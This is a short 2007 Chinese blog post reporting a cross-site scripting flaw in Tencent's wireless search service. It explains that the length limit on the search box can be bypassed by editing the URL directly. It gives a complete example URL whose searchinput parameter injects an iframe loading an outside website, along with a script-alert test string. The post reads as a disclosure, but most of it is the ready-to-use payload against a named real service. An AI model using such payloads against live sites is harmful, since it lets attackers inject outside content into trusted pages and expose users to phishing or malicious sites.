数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



[原创]腾讯漏洞,无线搜索XSS!
樱木花盗 发表于 2007-7-23 9:48:28

From 樱木花盗's BLOG

腾讯无线搜索跨站漏洞。。。只限制了输入框内的长度

当我拿 <script>alert()</script> 试验的时候正好少了个 > 呵呵,没关系,直接在地址栏里改提交的内容就可以了。。。

Example:

http://so.sms.qq.com/MqqSearch/WebSearchServlet?searchscope=all&searchpg=1&searchpgsize=10&searchch=0&from=&searchinput=<Iframe%20src="http://www.03389.com"%20width=800%20height=600></iframe>

 


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.